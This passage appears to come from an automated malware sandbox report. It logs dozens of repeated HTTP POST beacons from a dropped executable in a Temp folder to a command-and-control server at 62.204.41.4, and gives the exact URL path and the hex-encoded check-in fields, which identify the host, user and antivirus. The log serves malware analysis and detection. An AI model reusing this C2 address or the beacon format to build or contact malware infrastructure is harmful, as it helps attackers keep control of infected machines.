                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.679874897 CET640INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      195192.168.2.74992162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:50.850421906 CET641OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.914513111 CET641INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      196192.168.2.74992262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:51.089880943 CET642OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:51.156610966 CET642INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      197192.168.2.74992362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:51.342927933 CET643OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:51.409949064 CET643INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      198192.168.2.74992462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:51.587444067 CET644OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:51.654720068 CET644INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      199192.168.2.74992562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:52.126735926 CET645OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:52.192497969 CET645INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.74972662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:56.260662079 CET365OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:56.327101946 CET380INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      20192.168.2.74974462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:02.475153923 CET452OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.539536953 CET452INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      200192.168.2.74992662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:52.489078999 CET646OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:52.560206890 CET646INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      201192.168.2.74992762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:52.819700956 CET647OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:52.885586023 CET647INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      202192.168.2.74992862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:53.692434072 CET648OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:53.756938934 CET648INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      203192.168.2.74992962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:54.008802891 CET649OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:54.074717999 CET649INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      204192.168.2.74993062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:55.312009096 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:55.375792027 CET651INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      205192.168.2.74993262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:55.578352928 CET658OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:55.641483068 CET658INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      206192.168.2.74993362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:55.825768948 CET659OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:55.889779091 CET659INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      207192.168.2.74993462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:56.059242010 CET660OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.125365019 CET660INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      208192.168.2.74993562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:56.304075003 CET661OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.367465019 CET661INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      209192.168.2.74993662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:56.541075945 CET662OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.605768919 CET662INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      21192.168.2.74974562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:02.707218885 CET453OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.771678925 CET453INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      210192.168.2.74993762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:56.780040979 CET663OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.843110085 CET663INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
